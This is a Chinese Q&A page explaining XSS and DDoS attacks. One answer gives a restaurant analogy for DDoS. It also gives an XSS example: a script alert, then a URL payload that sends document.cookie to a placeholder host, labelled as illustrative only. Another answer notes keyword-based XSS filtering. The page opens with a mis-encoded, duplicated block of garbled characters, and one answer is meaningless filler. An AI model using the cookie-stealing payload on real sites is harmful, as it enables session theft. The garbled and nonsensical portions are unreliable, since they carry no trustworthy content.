如题所述
XSSæ»å»ï¼è·¨ç«èæ¬æ»å»(Cross Site Scripting)ï¼ä¸ºä¸åå±å æ ·å¼è¡¨(Cascading Style Sheets, CSS)ç缩åæ··æ·ï¼æ
å°è·¨ç«èæ¬æ»å»ç¼©å为XSSã
åå¸å¼æç»æå¡(DDoS:Distributed Denial of Service)æ»å»æåå©äºå®¢æ·/æå¡å¨ææ¯ï¼å°å¤ä¸ªè®¡ç®æºèåèµ·æ¥ä½ä¸ºæ»å»å¹³å°ï¼å¯¹ä¸ä¸ªæå¤ä¸ªç®æ åå¨DDoSæ»å»ï¼ä»èæåå°æé«æç»æå¡æ»å»çå¨åãé常ï¼æ»å»è 使ç¨ä¸ä¸ªå·çªå¸å·å°DDoS主æ§ç¨åºå®è£ å¨ä¸ä¸ªè®¡ç®æºä¸ï¼å¨ä¸ä¸ªè®¾å®çæ¶é´ä¸»æ§ç¨åºå°ä¸å¤§é代çç¨åºé讯ï¼ä»£çç¨åºå·²ç»è¢«å®è£ å¨ç½ç»ä¸ç许å¤è®¡ç®æºä¸ã代çç¨åºæ¶å°æ令æ¶å°±åå¨æ»å»ãå©ç¨å®¢æ·/æå¡å¨ææ¯ï¼ä¸»æ§ç¨åºè½å¨å ç§éå æ¿æ´»æç¾ä¸å次代çç¨åºçè¿è¡ã
åå¸å¼æç»æå¡(DDoS:Distributed Denial of Service)æ»å»æåå©äºå®¢æ·/æå¡å¨ææ¯ï¼å°å¤ä¸ªè®¡ç®æºèåèµ·æ¥ä½ä¸ºæ»å»å¹³å°ï¼å¯¹ä¸ä¸ªæå¤ä¸ªç®æ åå¨DDoSæ»å»ï¼ä»èæåå°æé«æç»æå¡æ»å»çå¨åãé常ï¼æ»å»è 使ç¨ä¸ä¸ªå·çªå¸å·å°DDoS主æ§ç¨åºå®è£ å¨ä¸ä¸ªè®¡ç®æºä¸ï¼å¨ä¸ä¸ªè®¾å®çæ¶é´ä¸»æ§ç¨åºå°ä¸å¤§é代çç¨åºé讯ï¼ä»£çç¨åºå·²ç»è¢«å®è£ å¨ç½ç»ä¸ç许å¤è®¡ç®æºä¸ã代çç¨åºæ¶å°æ令æ¶å°±åå¨æ»å»ãå©ç¨å®¢æ·/æå¡å¨ææ¯ï¼ä¸»æ§ç¨åºè½å¨å ç§éå æ¿æ´»æç¾ä¸å次代çç¨åºçè¿è¡ã
温馨提示:答案为网友推荐,仅供参考
第1个回答 2017-06-22
XSS攻击的定义:
XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
DDOS攻击的定义:
分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
一、举个XSS的例子
1. 做个假设,当亚马逊在搜索书籍,搜不到书的时候显示提交的名称。
2. 在搜索框搜索内容,填入“<script>alert('handsome boy')</script>”, 点击搜索。
3. 当前端页面没有对返回的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。
4. 进而可以构造获取用户cookies的地址,通过QQ群或者垃圾邮件,来让其他人点击这个地址:
http://域名/search?name=<script>document.location='http://域名/get?cookie='+document.cookie</script>PS:这个地址当然是没效的,只是举例子而已。
二、举个DDOS攻击的例子:
DDOS主要是流量攻击。
就好比你有一个餐馆(网站、APP),客容量正常是20人(正常访问用户量),忽然有一天冲进来100个人(流量攻击),把你的餐馆堵死,既不吃饭也水说话,就那样坐着影响你做生意。
怎么样,是不是理解清楚了。
第2个回答 2020-08-11
传统防御技术传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包含“javascript”,就认定为XSS攻击
第3个回答 2019-06-03
您公民你您您公民哥哥的,的,的,一个人走。
